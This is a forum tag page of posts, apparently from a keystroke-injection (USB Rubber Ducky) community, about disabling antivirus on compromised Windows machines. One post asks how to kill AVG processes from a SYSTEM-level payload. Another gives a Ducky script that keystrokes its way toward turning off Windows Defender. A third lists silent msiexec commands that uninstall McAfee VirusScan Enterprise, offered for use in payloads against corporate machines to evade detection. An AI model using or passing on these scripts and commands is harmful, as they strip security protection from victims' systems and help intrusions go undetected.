Showing results for tags 'av'.
-
Hey, I recently tried to kill the AV processes of, for example, AVG. My payload had SYSTEM privileges but I couldn't kill the AV processes, which also run under the SYSTEM user. I noticed a process which ran higher than SYSTEM which belonged to AVG. Is it common that an AV has some sort of process which runs in kernel mode or something which protects the other processes? Is there even a way to kill the AV as a SYSTEM user?
-
Hello all, I've put together a simple script that attempts to disable Windows Defender on Windows 8.1 (will update to 7 later). My only problem is that I have an issue where there is a check box titled "turn on this app" and when I tab over to it, there is no way for me to uncheck that selection. I hope that someone might either find a workaround to my method or find a way to make it work. Thank you.

Disable Windows Defender:

REM Author : Hobbes
REM Description : Attempts to disable Windows Defender anti-virus.
REM Note : Only tested on Windows 8.1 - Windows 7 compatibility unknown.
REM ***[Initial Delay]***
DELAY 3000
REM ***[Navigate to Windows Defender]***
GUI r
DELAY 250
STRING cmd
ENTER
DELAY 800
STRING start "" "C:\Program Files\Windows Defender\MSASCui.exe"
ENTER
DELAY 400
REM ***[Disables Defender]***
TAB
DELAY 80
TAB
DELAY 80
RIGHTARROW
DELAY 80
RIGHTARROW
DELAY 80
RIGHTARROW
DELAY 80
TAB
DELAY 80
DOWNARROW
DELAY 80
DOWNARROW
DELAY 80
DOWNARROW
DELAY 80
DOWNARROW
DELAY 80
DOWNARROW
DELAY 80
DOWNARROW
DELAY 80
TAB
-
I found the following little tidbit that has been of great use in corporate environments. Simply adding the appropriate line toward the top of your ducky script (or adding them all just in case works too) can significantly decrease AV detection (considering it removes it from the equation!) :D

VirusScan Enterprise (VSE) command line removal using msiexec.exe:

Click Start, Run. Type the removal string for your version of VSE, then click OK.

VirusScan Enterprise 8.8
msiexec /x {CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF} REMOVE=ALL REBOOT=R /q

VirusScan Enterprise 8.7i
msiexec /x {147BCE03-C0F1-4C9F-8157-6A89B6D2D973} REMOVE=ALL REBOOT=R /q

VirusScan Enterprise 8.5i
msiexec.exe /x {35C03C04-3F1F-42C2-A989-A757EE691F65} REMOVE=ALL REBOOT=R /q

VirusScan Enterprise 8.0i
msiexec.exe /x {5DF3D1BB-894E-4DCD-8275-159AC9829B43} REMOVE=ALL REBOOT=R /q

Switches that you can use with msiexec.exe:

/q  The quiet switch ensures the removal is done silently - nothing is displayed.
/x  This switch will automatically remove an installation.
/i  This switch will communicate via the UI (User Interface) and is used to Repair, Remove, or Modify an installation.
/?  This switch provides additional information on all msiexec.exe command switches.